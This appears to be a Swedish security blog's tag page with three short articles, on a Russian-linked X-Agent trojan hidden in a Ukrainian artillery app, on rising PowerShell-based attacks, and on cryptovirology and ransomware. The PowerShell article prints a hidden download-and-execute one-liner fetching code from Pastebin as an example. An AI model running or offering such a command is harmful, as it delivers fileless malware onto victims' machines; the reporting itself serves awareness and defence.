Taggat med: trojan

Rysk statlig Android-trojan riktad mot ukrainska soldater

Amerikanska företaget CrowdStrike har tittat närmare på en Android-applikation som används av ukraniska soldater. Denna applikation underlättar hanteringen av kanonen 122 mm howitzer 2A18 (D-30) och beräknas ha 9000 användare.

Applikationen som går under namnet Попр-Д30.apk har utvecklats av en officerare inom den ukraniska militären. Nu har dock CrowdStrike upptäckt att APK:en innehåller FANCY BEAR X-Agent trojanen.

Aktören bakom FANCY BEAR-gruppen misstänks vara den ryska militära underrättelsetjänsten GRU (ГРУ).

Попр-Д30.apk md5: 6f7523d3019fa190499f327211e01fcb

Applikationen har ej funnits i Google Play-store och utvecklades mellan den 20 Februari och 13 April 2013.

Trojanen X-Agent som enbart används av FANCY BEAR även finns till iOS kan läsa av kontaktlistor, samtalshistorik, SMS samt internetdata. Även misstänks appen användas för att kartlägga truppförflyttningar och har troligtvis gett ryssland värdefull information vid annekteringen av Krim och Sevastopol.

Läs även: Appen som spelade en vital roll i det turkiska kuppförsöket

Skärmdump från appen:

Попр-Д30

Här kan du ladda hem rapporten om appen från CrowdStrike:

Cyberangrepp som använder PowerShell ökar

Powershell är ett avancerat skript-språk till Windows som funnits i över 10 år där målet är att byta ut klassiska CMD.exe i framtiden (DOS-kommandotolk). Exempelvis så är standardskalet i Windows 10 just PowerShell. PowerShell är också populärt bland Windows-administratörer för dess förmåga att underlätta admin-arbete och har många olika funktioner vilket även gör det populärt för skadlig kod.

Enligt säkerhetsföretaget Symantec så är 95.4% av alla analyserade powershell-skript skadliga och många organisationer saknar förmåga att upptäcka skadliga powershell-skript uppger företaget. Detta för att loggningen är bristfällig i standardkonfigurationen. Att obfuskera och ändra i powershell-skript och således undgå enklare kontroller i form av strängmatchning och checksummor är också trivialt.

Den senaste alfa-versionen av PowerShell som heter version 6 har utökat stöd för loggning och flertalet olika säkerhetshöjande funktioner.

Följande PowerShell-versioner används som standard i Microsofts olika operativsystem:

Det finns PowerShell-skript för nästan allt, från att skapa ett nätverkssniffer eller för läsa ut lösenord. Vissa hot, t.ex. som Trojan.Kotver som försöker att ladda hem och installera PowerShells-ramverk om den inte är installerad på den infekterade datorn. Även så stödjer PowerShell att ladda hem och exekvera kod direkt i minnet vilket kan försvåra forensiska undersökningar.

Exempel på kod som laddar ner och exekverar kod från Pastebin:

powershell -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient). DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”

Följande 37-sidiga whitepaper från Symantec innehåller en hel del matnyttigt:

Kryptovirus, Cryptovirology eller Kryptomalware

Kryptovirus/kryptomalware eller på engelska cryptovirology är ett uttryck som Adam L. Young, PhD samt Moti M. Yung, PhD skapat för att beskriva skadlig kod (malware) som använder sig av krypto.

Cryptovirology är ett område som studerar hur man använder kryptering för att utforma kraftfull skadlig kod”

Några exempel på skadlig kod som använder sig av kryptovirus är: Gpcode, Cryzip, samt Krotten. Dessa tre olika trojaner håller dina filer på datorn som gissla (krypterar) och begär sedan en summa pengar för att du ska få en nyckel för att dekryptera filerna.

Ett annat populärt namn för denna typ av skadlig kod är även ransomware.

Området Cryptovirology omfattar även kryptoattacker där angriparen i hemlighet stjäl privat information såsom privata nycklar. Ett exempel på den senare typen av attack är en asymmetrisk bakdörr. En asymmetrisk bakdörr är en bakdörr (t.ex. i en kryptosystem) som kan användas endast av angriparen även efter det att den eventuellt upptäckts.